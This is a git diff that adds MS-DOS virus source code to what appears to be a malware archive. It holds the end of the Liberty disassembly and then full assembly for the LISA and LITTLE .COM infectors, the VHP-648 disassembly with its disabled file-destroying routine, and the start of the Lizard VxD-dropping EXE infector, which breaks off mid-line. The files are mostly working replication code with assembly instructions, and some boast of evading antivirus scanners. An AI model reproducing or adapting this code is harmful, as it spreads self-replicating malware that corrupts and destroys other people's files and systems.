[0A94],AX ; Time for gadgets off ? +CS:0A7D 7446 JZ 0AC5 +CS:0A7F 770B JA 0A8C +CS:0A81 2E CS: +CS:0A82 833E960A0A CMP WORD PTR [0A96],+0A ; Time for screen messing ? +CS:0A87 7503 JNZ 0A8C +CS:0A89 E886FE CALL 0912 ; Mess up screen +CS:0A8C 1F POP DS +CS:0A8D 58 POP AX +CS:0A8E 9D POPF +CS:0A8F EA00000000 JMP 0000:0000 ; Continue +CS:0A9B B8FFFF MOV AX,FFFF +CS:0A9E 50 PUSH AX +CS:0A9F 33C0 XOR AX,AX +CS:0AA1 50 PUSH AX +CS:0AA2 CB RETF +CS:0AA3 2E CS: +CS:0AA4 812E980A5001 SUB WORD PTR [0A98],0150 +CS:0AAA 33C0 XOR AX,AX +CS:0AAC 8ED8 MOV DS,AX +CS:0AAE 2E CS: +CS:0AAF C606470B00 MOV BYTE PTR [0B47],00 +CS:0AB4 90 NOP +CS:0AB5 2E CS: +CS:0AB6 C606950B00 MOV BYTE PTR [0B95],00 +CS:0ABB 90 NOP +CS:0ABC 2E CS: +CS:0ABD C606080C00 MOV BYTE PTR [0C08],00 +CS:0AC2 90 NOP +CS:0AC3 EBC7 JMP 0A8C +CS:0AC5 2E CS: +CS:0AC6 C606470BFF MOV BYTE PTR [0B47],FF +CS:0ACB 90 NOP +CS:0ACC 2E CS: +CS:0ACD C606950BFF MOV BYTE PTR [0B95],FF +CS:0AD2 90 NOP +CS:0AD3 2E CS: +CS:0AD4 C606080CFF MOV BYTE PTR [0C08],FF +CS:0AD9 90 NOP +CS:0ADA 2E CS: +CS:0ADB C706940A0000 MOV WORD PTR [0A94],0000 +CS:0AE1 2E CS: +CS:0AE2 FF06960A INC WORD PTR [0A96] +CS:0AE6 EBA4 JMP 0A8C +CS:0AE8 A14000 MOV AX,[0040] +CS:0AEB 2E CS: +CS:0AEC A3430B MOV [0B43],AX +CS:0AEF A14200 MOV AX,[0042] +CS:0AF2 2E CS: +CS:0AF3 A3450B MOV [0B45],AX +CS:0AF6 B8360B MOV AX,0B36 +CS:0AF9 FA CLI +CS:0AFA A34000 MOV [0040],AX +CS:0AFD 8C0E4200 MOV [0042],CS +CS:0B01 C3 RET +CS:0B02 FA CLI +CS:0B03 A15000 MOV AX,[0050] +CS:0B06 2E CS: +CS:0B07 A3910B MOV [0B91],AX +CS:0B0A A15200 MOV AX,[0052] +CS:0B0D 2E CS: +CS:0B0E A3930B MOV [0B93],AX +CS:0B11 B8840B MOV AX,0B84 +CS:0B14 A35000 MOV [0050],AX +CS:0B17 8C0E5200 MOV [0052],CS +CS:0B1B C3 RET +CS:0B1C FA CLI +CS:0B1D A15C00 MOV AX,[005C] +CS:0B20 2E CS: +CS:0B21 A3040C MOV [0C04],AX +CS:0B24 A15E00 MOV AX,[005E] +CS:0B27 2E CS: +CS:0B28 A3060C MOV [0C06],AX +CS:0B2B B8FC0B MOV AX,0BFC +CS:0B2E A35C00 MOV [005C],AX +CS:0B31 8C0E5E00 MOV [005E],CS +CS:0B35 C3 RET +; +; Now the gadgets' routines. When activated, only the word MAGIC!! will be +; sent to screen, port, and printer. +; +CS:0B36 9C PUSHF ; Screen +CS:0B37 80FC09 CMP AH,09 +CS:0B3A 740F JZ 0B4B +CS:0B3C 80FC0A CMP AH,0A +CS:0B3F 740A JZ 0B4B +CS:0B41 9D POPF +CS:0B42 EA00000000 JMP 0000:0000 +CS:0B4B 2E CS: +CS:0B4C 803E470BFF CMP BYTE PTR [0B47],FF +CS:0B51 74EE JZ 0B41 +CS:0B53 53 PUSH BX +CS:0B54 56 PUSH SI +CS:0B55 50 PUSH AX +CS:0B56 33DB XOR BX,BX +CS:0B58 2E CS: +CS:0B59 833E480B07 CMP WORD PTR [0B48],+07 +CS:0B5E 7507 JNZ 0B67 +CS:0B60 2E CS: +CS:0B61 C706480B0000 MOV WORD PTR [0B48],0000 +CS:0B67 2E CS: +CS:0B68 8B1E480B MOV BX,[0B48] +CS:0B6C 2E CS: +CS:0B6D 8B3E480B MOV DI,[0B48] +CS:0B71 47 INC DI +CS:0B72 2E CS: +CS:0B73 893E480B MOV [0B48],DI +CS:0B77 BE3B0C MOV SI,0C3B +CS:0B7A 58 POP AX +CS:0B7B 2E CS: +CS:0B7C 8A00 MOV AL,[BX+SI] +CS:0B7E FEC0 INC AL +CS:0B80 5E POP SI +CS:0B81 5B POP BX +CS:0B82 EBBD JMP 0B41 +CS:0B84 9C PUSHF ; Port +CS:0B85 80FC01 CMP AH,01 +CS:0B88 740D JZ 0B97 +CS:0B8A 80FC02 CMP AH,02 +CS:0B8D 7436 JZ 0BC5 +CS:0B8F 9D POPF +CS:0B90 EA00000000 JMP 0000:0000 +CS:0B97 2E CS: +CS:0B98 803E950BFF CMP BYTE PTR [0B95],FF +CS:0B9D 74F0 JZ 0B8F +CS:0B9F 53 PUSH BX +CS:0BA0 56 PUSH SI +CS:0BA1 33DB XOR BX,BX +CS:0BA3 2E CS: +CS:0BA4 8A1E960B MOV BL,[0B96] +CS:0BA8 BE3B0C MOV SI,0C3B +CS:0BAB 2E CS: +CS:0BAC 8A00 MOV AL,[BX+SI] +CS:0BAE 2E CS: +CS:0BAF FE06960B INC BYTE PTR [0B96] +CS:0BB3 2E CS: +CS:0BB4 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BB9 7506 JNZ 0BC1 +CS:0BBB 2E CS: +CS:0BBC C606960B00 MOV BYTE PTR [0B96],00 +CS:0BC1 5E POP SI +CS:0BC2 5B POP BX +CS:0BC3 EBCA JMP 0B8F +CS:0BC5 2E CS: +CS:0BC6 803E950BFF CMP BYTE PTR [0B95],FF +CS:0BCB 74C2 JZ 0B8F +CS:0BCD 2E CS: +CS:0BCE FF1E910B CALL FAR [0B91] +CS:0BD2 80FC00 CMP AH,00 +CS:0BD5 7F24 JG 0BFB +CS:0BD7 53 PUSH BX +CS:0BD8 56 PUSH SI +CS:0BD9 33DB XOR BX,BX +CS:0BDB 2E CS: +CS:0BDC 8A1E960B MOV BL,[0B96] +CS:0BE0 BE3B0C MOV SI,0C3B +CS:0BE3 2E CS: +CS:0BE4 8A00 MOV AL,[BX+SI] +CS:0BE6 2E CS: +CS:0BE7 FE06960B INC BYTE PTR [0B96] +CS:0BEB 2E CS: +CS:0BEC 803E960B07 CMP BYTE PTR [0B96],07 +CS:0BF1 7506 JNZ 0BF9 +CS:0BF3 2E CS: +CS:0BF4 C606960B00 MOV BYTE PTR [0B96],00 +CS:0BF9 5E POP SI +CS:0BFA 5B POP BX +CS:0BFB CF IRET +CS:0BFC 9C PUSHF ; Printer +CS:0BFD 80FC00 CMP AH,00 +CS:0C00 7407 JZ 0C09 +CS:0C02 9D POPF +CS:0C03 EA00000000 JMP 0000:0000 +CS:0C09 2E CS: +CS:0C0A 803E080CFF CMP BYTE PTR [0C08],FF +CS:0C0F 74F1 JZ 0C02 +CS:0C11 53 PUSH BX +CS:0C12 56 PUSH SI +CS:0C13 33DB XOR BX,BX +CS:0C15 2E CS: +CS:0C16 8A1E3A0C MOV BL,[0C3A] +CS:0C1A BE3B0C MOV SI,0C3B +CS:0C1D 2E CS: +CS:0C1E 8A00 MOV AL,[BX+SI] +CS:0C20 FEC0 INC AL +CS:0C22 2E CS: +CS:0C23 FE063A0C INC BYTE PTR [0C3A] +CS:0C27 2E CS: +CS:0C28 803E3A0C07 CMP BYTE PTR [0C3A],07 +CS:0C2D 7507 JNZ 0C36 +CS:0C2F 2E CS: +CS:0C30 C6063A0C00 MOV BYTE PTR [0C3A],00 +CS:0C35 90 NOP +CS:0C36 5E POP SI +CS:0C37 5B POP BX +CS:0C38 EBC8 JMP 0C02 +; +; The encrypted text 'MAGIC!!' +; +DS:0C3A 4C 40 46 48 42 20 20 +; +; Important note: +; When there is no longer space on the disk to infect a file, the Liberty +; virus will infect the bootsector. This is done in the 'OHIO' way. +; +; +; +; End of Liberty (2867) disassembly. (c) 1991 by Remco van Helvoort. +; This document may be freely shared. If you have any comments or some +; nice little viruses for analysis, feel free to drop me a note. +; +; Remco van Helvoort +; Bredastraat 3 +; 5224 VD 's-Hertogenbosch +; Holland +; + +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ +; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + diff --git a/MSDOS/Virus.MSDOS.Unknown.lisa.asm b/MSDOS/Virus.MSDOS.Unknown.lisa.asm new file mode 100644 index 00000000..274b4c12 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lisa.asm @@ -0,0 +1,192 @@ +; Virusname: LISA +; Origin: Sweden +; Author: Metal Militia +; Date: 24/12/1994 +; +; This virus can't be found with any anti-virus program (of the below +; that is) SCAN/TB-SCAN/F-PROT/SOLOMON. This because of that it's totally +; new written. +; +; It's a non-resident, encrypted, .com infector that spread with the +; "dot-dot" method. No damage is made, and no message is shown, but +; inside the code you can find some love greetings to the flower in +; my heart, Lisa Olsson. This was written on the christmas eve, as a +; 'happy new year' greeting to her, then especially for '94, but +; also for all other coming years. +; +; I may continue on thisone and make more and better versions. +; PS!, to tasm this virus, write: tasm /m3 lisa.asm, then just +; link it to a .com file by writing: tlink /t lisa.obj. + + + Lisavirus segment + Assume CS:LisaVirus + Org 100h ; account for PSP + + Start: db 0e9h ; jmp duh ; Jump to duh + dw 0 + + duh: call next + next: pop bp ; bp holds current location + sub bp, offset next ; calculate net change + jmp go_for_it + + go_for_it: + call encrypt_decrypt ; encrypt/decrypt it.. + + jmp restore ; jump to the real "start". + +write_virus: + mov word ptr [bp+crypt_val],30h ; Here we use the enc_value + call encrypt_decrypt ; call encrypt/decrypt + mov cx, eov - duh ; Write the virus + lea dx, [bp+duh] + mov ah, 40h + int 21h + call encrypt_decrypt ; call encrypt/decrypt (again, just like the text says) + ret ; ret(urn) to the "caller" + +crypt_val dw 0 ; encryption value + +encrypt_decrypt: + mov ax,word ptr [bp+crypt_val] ; the encrypt/decrypt rountine + lea si,[bp+encrypt_start] + mov cx,(eov-duh+1)/2 +again: + xor word ptr [si],ax ; XOR's kicking it :) + inc si + inc si + loop again ; loop it all + ret ; ret(urn) to caller + +encrypt_start: ; start of encryption +restore: + lea si, [bp+offset stuff] ; Restore the beginning + mov di, 100h ; (see stuff, the buffer) + push di + movsw + movsb + + lea dx, [bp+offset dta] ; Set the DTA + call set_dta + + mov ah,47h ; Get the current directory (will be restored lateron) + xor dl,dl + lea si,[bp+eov+2ch] + int 21h + + findfirst: + mov ah, 4eh ; Find first + lea dx, [bp+masker] ; search for '*.COM',0 + tryanother: + int 21h + jc chdir ; Quit on error + + mov ax, 3D02h ; Open the file + lea dx, [bp+offset dta+30] ; File name is located in DTA + int 21h + xchg ax, bx ; instead on mov bx,ax.. one byte saved :) + + mov ax,5700h ; Take the file's time + int 21h + + push cx + push dx + + mov cx, 3 ; Read in the first three bytes + lea dx, [bp+stuff] + mov ah, 3fh + int 21h + ; Check if already infected + mov cx, word ptr [bp+stuff+1] ; jmp location + mov ax, word ptr [bp+dta+26] + add cx, eov - duh + 3 ; convert to filesize + cmp ax, cx ; if same, already infected + jz close ; so quit out of here + + sub ax, 3 ; ax = filesize - 3 + mov word ptr [bp+writebuffer], ax + + xor al, al ; Go to the beginning + call f_ptr + + mov cx, 3 ; Write three bytes + lea dx, [bp+e9] + mov ah, 40h + int 21h + + mov al, 2 ; Go to the end + call f_ptr + + mov ah,2ch + int 21h + + mov word ptr [bp+crypt_val],dx + + call write_virus + + close: + pop dx + pop cx + + mov ax,5701h ; Restore the files time + int 21h + + mov ah, 3eh ; Close the file + int 21h + + ; Try infecting another file + mov ah, 4fh ; Find next, try to infect + jmp short tryanother ; another file. + + chdir: + mov ah,3bh ; Change up one dir + lea dx,[bp+offset newdir] + int 21h + jc quit + + jmp findfirst + + quit: + real_quit: + lea dx,[bp+eov+2ch] ; Restore the DIR + mov ah,3bh + int 21h + + fix_it: + mov dx, 80h ; Restore the DTA to the + ; default + set_dta: + mov ah, 1ah ; Set the disk transfer + int 21h ; address + + exit: + retn ; Return to org. program + f_ptr: mov ah, 42h + xor cx, cx + cwd ; equal to xor dx,dx or the + int 21h ; other style, sub dx,dx + retn + + db 'love.girl.LISA.forever.666 ' ; + db '(c) Metal Militia / Immortal Riot ' + db 'Sweden 24/12/93 ' ; the Date of finish, christmas eve + db 'Thunderclouds pass the sky, dreams & thoughts ' + db 'goes thrue my mind.. winds of love, floods of ' + db "hope, until the day, when you'll be mine!.... " + db 'Dedicated to Lisa Olsson who will always be my passion ' + db 'my obsession and my infinite dream. All i ever wanted, ' + db 'all i ever asked for. Happy new year, yours Metal..... ' + + newdir db '..',0 ; needed to move up one dir (dot-dot method) + masker db '*.com',0 ; filetype to infect, .com-files + greets db 'Greets to Raver and The Unforgiven/IR' ; greets to my + ; friends + stuff db 0cdh, 20h, 0 ; original three bytes saved here + e9 db 0e9h ; the jmp + eov equ $ ; end of virus/encryption + writebuffer dw ? ; Scratch area for the JMP + ; offset holding. + dta db 42 dup (?) ; the DTA thingy (42 dup) + LisaVirus ENDS + END Start \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lisbon2.asm b/MSDOS/Virus.MSDOS.Unknown.lisbon2.asm new file mode 100644 index 00000000..59911d23 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lisbon2.asm @@ -0,0 +1,331 @@ + name Virus + title Disassembly listing of the VHP-648 virus + .radix 16 +code segment + assume cs:code,ds:code + org 100 +environ equ 2C + +start: + jmp virus + +message db 'Hello, world!$' + + mov ah,9 + mov dx,offset message + int 21 + int 20 + +virus: + push cx ;Save CX + + mov dx,offset data ;Restore original first instruction +modify equ $-2 ;The instruction above is changed + ; before each contamination + cld + mov si,dx + add si,saveins-data ;Instruction saved there + mov di,offset start + mov cx,3 ;Move 3 bytes + rep movsb ;Do it + mov si,dx ;Keep SI pointed at data + + mov ah,30 ;Get DOS version + int 21 + cmp al,0 ;Less than 2.0? + jne skip1 + jmp exit ;Exit if so + +skip1: + push es ;Save ES + mov ah,2F ;Get current DTA in ES:BX + int 21 + mov word ptr [si+0],bx ;dtaadr + mov word ptr [si+2],es + pop es ;Restore ES + + mov dx,mydta-data + add dx,si + mov ah,1A ;Set DTA + int 21 + + push es ;Save ES & SI + push si + mov es,ds:[environ] ;Environment address + mov di,0 +n_00015A: ;Search 'PATH=' in the environment + pop si ;Restore data offset in SI + push si + add si,pathstr-data + lodsb + mov cx,8000 ;Maximum 32K in environment + repne scasb ;Search for first letter ('P') + mov cx,4 ;4 letters in 'PATH' +n_000169: + lodsb ;Search for next char + scasb + jne n_00015A ;If not found, search for next 'P' + loop n_000169 ;Loop until done + pop si ;Restore SI & ES + pop es + + mov [si+16],di ;Save 'PATH' offset in poffs + mov di,si + add di,fname-data ;Point SI & DI at '=' sign + mov bx,si ;Point BX at data area + add si,fname-data + mov di,si + jmp short n_0001BF + +n_000185: + cmp word ptr [si+16],6C ;poffs + jne n_00018F + jmp olddta +n_00018F: + push ds + push si + mov ds,es:[environ] + mov di,si + mov si,es:[di+16] ;poffs + add di,fname-data +n_0001A1: + lodsb + cmp al,';' + je n_0001B0 + cmp al,0 + je n_0001AD + stosb + jmp n_0001A1 +n_0001AD: + mov si,0 +n_0001B0: + pop bx + pop ds + mov [bx+16],si ;poffs + cmp byte ptr [di-1],'\' + je n_0001BF + mov al,'\' ;Add '\' if not already present + stosb + +n_0001BF: + mov [bx+18],di ;Save '=' offset in eqoffs + mov si,bx ;Restore data pointer in SI + add si,allcom-data + mov cx,6 ;6 bytes in ASCIIZ '*.COM' + rep movsb ;Move '*.COM' at fname + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + mov dx,fname-data + add dx,si + mov cx,11b ;Hidden, Read/Only or Normal files + int 21 + jmp short n_0001E3 + +findnext: + mov ah,4F ;Find next file + int 21 +n_0001E3: + jnc n_0001E7 ;If found, try to contaminate it + jmp n_000185 ;Otherwise search in another directory + +n_0001E7: + mov ax,[si+75] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + cmp [si+79],64000d ;Is file size greather than 64,000 bytes? + ja findnext ;If so, search for next file + cmp word ptr [si+79],10d ;Is file size less than 10 bytes? + jb findnext ;If so, search for next file + + mov di,[si+18] ;eqoffs + push si ;Save SI + add si,namez-data ;Point SI at namez +n_000209: + lodsb + stosb + cmp al,0 + jne n_000209 + + pop si ;Restore SI + mov ax,4300 ;Get file attributes + mov dx,fname-data + add dx,si + int 21 + + mov [si+8],cx ;Save them in fattrib + mov ax,4301 ;Set file attributes + +;The next `db's are there because MASM can't assemble +; the instruction `and cx,0FFFE' correctly (the fool!): + + db 081,0E1,0FE,0FF +; and cx,not 1 ;Turn off Read Only flag + mov dx,fname-data + add dx,si + int 21 + + mov ax,3D02 ;Open file with Read/Write access + mov dx,fname-data + add dx,si + int 21 + jnc n_00023E + jmp oldattr ;Exit on error + +n_00023E: + mov bx,ax ;Save file handle in BX + mov ax,5700 ;Get file date & time + int 21 + mov [si+4],cx ;Save time in ftime + mov [si+6],dx ;Save date in fdate + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? + +;If so, destroy file (don't contaminate). Now this code is disabled. + + jmp short n_000266 ;CHANGED. Was jnz here + +;Destroy file by rewriting an illegal jmp as first instruction: + + mov ah,40 ;Write to file handle + mov cx,5 ;Write 5 bytes + mov dx,si + add dx,bad_jmp-data ;Write THESE bytes + int 21 ;Do it + jmp short oldtime ;Exit + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +n_000266: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + mov dx,saveins-data ;Put them there + add dx,si + int 21 + jc oldtime ;Exit on error + cmp ax,3 ;Are really 3 bytes read? + jne oldtime ;Exit if not + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + mov cx,0 ;0 bytes from end + mov dx,0 + int 21 + jc oldtime ;Exit on error + + mov cx,ax ;Get the value of file pointer + sub ax,3 ;Subtract 3 from it to get real code size + mov [si+14d],ax ;Save result in filloc + add cx,data-(virus-100) + mov di,si + sub di,data-modify ;A little self-modification + mov [di],cx + + mov ah,40 ;Write to file handle + mov cx,enddata-virus ;Virus code length as bytes to be written + mov dx,si + sub dx,data-virus ;Now DX points at virus label + int 21 + jc oldtime ;Exit on error + cmp ax,enddata-virus ;Are all bytes written? + jne oldtime ;Exit if not + + mov ax,4200 ;LSEEK from the beginning of the file + mov cx,0 ;Just at the file beginning + mov dx,0 + int 21 + jc oldtime ;Exit on error + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov ah,40 ;Write to file handle + mov cx,3 ;3 bytes to write + mov dx,si + add dx,newjmp-data ;Write THESE bytes + int 21 + +oldtime: + mov dx,[si+6] ;Restore file date + mov cx,[si+4] ; and time + +;And these again are due to the MASM 5.0 foolness: + + db 081,0E1,0E0,0FF + db 081,0C9,01F,000 +; and cx,not 11111b +; or cx,11111b ;Set seconds to 62 (?!) + + mov ax,5701 ;Set file date & time + int 21 + mov ah,3E ;Close file handle + int 21 + +oldattr: + mov ax,4301 ;Set file attributes + mov cx,[si+8] ;They were saved in fattrib + mov dx,fname-data + add dx,si + int 21 + +olddta: + push ds ;Save DS + mov ah,1A ;Set DTA + mov dx,[si+0] ;Restore saved DTA + mov ds,[si+2] + int 21 + pop ds ;Restore DS + +exit: + pop cx ;Restore CX + xor ax,ax ;Clear registers + xor bx,bx + xor dx,dx + xor si,si + mov di,100 ;Jump to CS:100 + push di ; by doing funny RET + xor di,di + ret -1 + +data label byte ;Data section +dtaaddr dd ? ;Disk Transfer Address +ftime dw ? ;File date +fdate dw ? ;File time +fattrib dw ? ;File attribute +saveins db 0EBh,0Fh,90 ;Original first 3 bytes +newjmp db 0E9 ;Code of jmp instruction +filloc dw ? ;File pointer is saved here +allcom db '*.COM',0 ;Filespec to search for +poffs dw ? ;Address of 'PATH' string +eqoffs dw ? ;Address of '=' sign +pathstr db 'PATH=' +fname db 40 dup (' ') ;Path name to search for + +;Disk Transfer Address for Find First / Find Next: + +mydta label byte +drive db ? ;Drive to search for +pattern db 13d dup (?) ;Search pattern +reserve db 7 dup (?) ;Not used +attrib db ? ;File attribute +time dw ? ;File time +date dw ? ;File date +fsize dd ? ;File size +namez db 13d dup (?) ;File name found + +;This replaces the first instruction of a destroyed file: + +bad_jmp db 0EA,0Bh,2,13,58 +enddata label byte + +code ends + end start + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.little.asm b/MSDOS/Virus.MSDOS.Unknown.little.asm new file mode 100644 index 00000000..7118ad97 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.little.asm @@ -0,0 +1,153 @@ +;A small (139 byte) virus with minimal required functionality. + +;This Virus for research purposes only. Please do not release! +;Please execute it only on a carefully controlled system, and only +;if you know what you're doing! + +;An example for + +;####################################################### +;# THE FIRST INTERNATIONAL VIRUS WRITING CONTEST # +;# 1 9 9 3 # +;# sponsored by # +;# American Eagle Publications, Inc. # +;####################################################### + +;Assemble this file with TASM 2.0 or higher: "TASM LITTLE;" +;Link as "TLINK /T LITTLE;" + +;Basic explanation of how this virus works: +; +;The virus takes control when the program first starts up. All of its code is +;originally located at the start of a COM file that has been infected. When +;the virus starts, it takes over a segment 64K above the one where the program +;was loaded by DOS. It copies itself up there, and then searches for an +;uninfected file. To determine if a file is infected, it checks the first two +;bytes to see if they are the same as its first two bytes. It reads the file +;into memory right above where it is sitting (at 100H in the upper segment). +;If not already infected, it just writes itself plus the file it infected back +;out to disk under the same file name. Then it moves the host in the lower +;segment back to offset 100H and executes it. + + + .model tiny ;Tiny model to create a COM file + + .code + +;DTA definitions +DTA EQU 0000H ;Disk transfer area +FSIZE EQU DTA+1AH ;file size location in file search +FNAME EQU DTA+1EH ;file name location in file search + + + ORG 100H + +;****************************************************************************** +;The virus starts here. + +VIRSTART: + mov ax,ds + add ax,1000H + mov es,ax ;upper segment is this one + 1000H + mov si,100H ;put virus in the upper segment + mov di,si ;at offset 100H +; mov cl,BYTE (OFFSET HOST AND 0FFH) ;can't code this with TASM + mov cl,8BH ;we can assume ch=0 + rep movsb ;this will louse the infection up if run under debug! + mov ds,ax ;set ds to high segment + push ds + mov ax,OFFSET FIND_FILE + push ax + retf ;jump to high memory segment + +;Now it's time to find a viable file to infect. We will look for any COM file +;and see if the virus is there already. +FIND_FILE: + xor dx,dx ;move dta to high segment + mov ah,1AH ;so we don't trash the command line + int 21H ;which the host is expecting + mov dx,OFFSET COMFILE + mov ch,3FH ;search for any file, no matter what attribute (note: cx=0 before this instr) + mov ah,4EH ;DOS search first function + int 21H +CHECK_FILE: jc ALLDONE ;no COM files to infect + + mov dx,FNAME ;first open the file + mov ax,3D02H ;r/w access open file, since we'll want to write to it + int 21H + jc NEXT_FILE ;error opening file - quit and say this file can't be used + mov bx,ax ;put file handle in bx, and leave it there for the duration + + mov di,FSIZE + mov cx,[di] ;get file size for reading into buffer + mov dx,si ;and read file in at HOST in new segment (note si=OFFSET HOST) + mov ah,3FH ;DOS read function + int 21H + mov ax,[si] ;si=OFFSET HOST here + jc NEXT_FILE ;skip file if error reading it + + cmp ax,WORD PTR [VIRSTART] ;see if infected already + jnz INFECT_FILE ;nope, go do it + + mov ah,3EH ;else close the file + int 21H ;and fall through to search for another file + +NEXT_FILE: mov ah,4FH ;look for another file + int 21H + jmp SHORT CHECK_FILE ;and go check it out + +COMFILE DB '*.COM',0 + +;When we get here, we've opened a file successfully, and read it into memory. +;In the high segment, the file is set up exactly as it will look when infected. +;Thus, to infect, we just rewrite the file from the start, using the image +;in the high segment. +INFECT_FILE: + xor cx,cx + mov dx,cx ;reset file pointer to start of file + mov ax,4200H + int 21H + + mov ah,40H + mov dx,100H + mov cx,WORD PTR [di] ;adjust size of file for infection + add cx,OFFSET HOST - 100H + int 21H ;write infected file + + mov ah,3EH ;close the file + int 21H + +;The infection process is now complete. This routine moves the host program +;down so that its code starts at offset 100H, and then transfers control to it. +ALLDONE: + mov ax,ss ;set ds, es to low segment again + mov ds,ax + mov es,ax + push ax ;prep for retf to host + shr dx,1 ;restore dta to original value + mov ah,1AH ;for compatibility + int 21H + mov di,100H ;prep to move host back to original location + push di +; mov cx,sp ;move code, but don't trash the stack +; sub cx,si + mov cx,0FE6FH ;hand code the above to save a byte + rep movsb ;move code + retf ;and return to host + +;****************************************************************************** +;The host program starts here. This one is a dummy that just returns control +;to DOS. + +HOST: + mov ax,4C00H ;Terminate, error code = 0 + int 21H + +HOST_END: + + END VIRSTART + + + + + \ No newline at end of file diff --git a/MSDOS/Virus.MSDOS.Unknown.lizard.asm b/MSDOS/Virus.MSDOS.Unknown.lizard.asm new file mode 100644 index 00000000..58ad8ee1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.lizard.asm @@ -0,0 +1,626 @@ +;----------------------------------------------------------------------------- +;Lizard by Reptile/29A (another version ;) +;----------------------------------------------------------------------------- + +; ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ +; ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ +; ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ +; ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ +; ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ + +;This is an encrypted vxd direct action dos exe infector (I added some anti- +;heuristics and other stuff and optimized the code of v1.0). + +;When an infected file is run the virus decrypts itself, drops lzd.vxd to the +;available one of the three dirs and then returns back to the host. After the +;next reboot... + +;When windoze 95 is starting, it loads the vxd (lzd.vxd) automatically coz +;it's in the '\iosubsys\' dir (Lizard doesn't need to modify the system.ini +;or the registry). Then the virus takes control and hooks the V86 interrupt +;chain. It executes on exec (4bh), create (3ch), ext. open (6ch), close (3eh) +;and on find first file (4eh) using direct action techniques to infect all +;dos exes in the current directory (*highly* infectious!). Lzd.vxd has a size +;of 7099 bytes (masm sux! :P ), but the victims are only increased by 1967 (!) +;bytes. + +;Findvirus v7.75, AVP v3.0 and TBAV v8.03 (high heuristic sensitivity!) can't +;detect it (all for win95). + +;Compiling lzd.vxd (win95 DDK): +;makefile + +;Compiling rmlzd.inc: +;tasm /m2 rmlzd.asm +;tlink /t rmlzd.obj +;file2db rmlzd.com (or another db generator) +;modify rmlzd.dat + +;To install copy lzd.vxd to one of the following dirs: +;- c:\windows\system\iosubsys +;- c:\win95\system\iosubsys +;- c:\windows.000\system\iosubsys +;...or start lizard.exe :) + +;P.S.: +;Sandy: are u lucky now? ;) +;Jacky: thanx for testing it! +;GriYo: the stack stuff really didn't work :P + +;P.P.S: +;TrY MaGiC MuShRoOmS... + +;---[LZD.ASM]----------------------------------------------------------------- + +.386p + +.xlist +include vmm.inc +.list + +vxdhsize equ 701 +vxddsize equ 81 +vxdcsize equ 880 +esize equ encend - encstart +vsize equ vend - start + +Declare_Virtual_Device LZD, 6, 66, LZD_Control, Undefined_Device_Id, \ +Undefined_Init_Order,, + +VxD_Locked_Data_Seg +wcard db '*.e?e',0 ;*.l?z +include rmlzd.inc ;realmode code +dflag db 0 +pflag db 0 +ndta db 43 dup (?) +header db 26 dup (?) +VxD_Locked_Data_Ends +;----------------------------------------------------------------------------- +VxD_Locked_Code_Seg +BeginProc LZD_Device_Init +;trigger +mov ah,2ah ;get date +vxdint 21h +;live drazil si +cmp dh,10 ;26.10.? +jne npload +cmp dl,26 +jne npload + +mov pflag,1 ;hehe + +npload: +mov eax,21h ;install int 21h handler +mov esi,offset32 int21h +VMMcall Hook_V86_Int_Chain +clc +ret +EndProc LZD_Device_Init +;----------------------------------------------------------------------------- +BeginProc int21h +cmp [ebp.Client_AH],4bh ;exec +je short ww +cmp [ebp.Client_AH],3ch ;create +je short ww +cmp [ebp.Client_AH],6ch ;ext. open +je short ww +cmp [ebp.Client_AH],3eh ;close +je short ww +cmp [ebp.Client_AH],4eh ;find first +je short ww +jmp prevhook + +ww: +Push_Client_State ;save regs +VMMcall Begin_Nest_Exec +;----------------------------------------------------------------------------- +cmp dflag,1 +je done +mov ax,3d02h ;open lzd.vxd +lea edx,dropname1 ;in the 'c:\windows\system\iosubsys' dir +vxdint 21h +jnc short rd + +mov ax,3d02h ;open the vxd +lea edx,dropname2 ;in the 'c:\win95\system\iosubsys' dir +vxdint 21h +jnc short rd + +mov ax,3d02h ;open the vxd +lea edx,dropname3 ;in the 'c:\windows.000\system\iosubsys' dir +vxdint 21h +jc ecsit ;skip it + +rd: +xchg ax,bx + +mov ah,3fh ;store the header of the vxd +mov cx,vxdhsize +lea edx,vxdheader +vxdint 21h + +mov ax,4201h ;jmp over zeros +xor cx,cx +mov dx,3400 +vxdint 21h + +mov ah,3fh ;store the 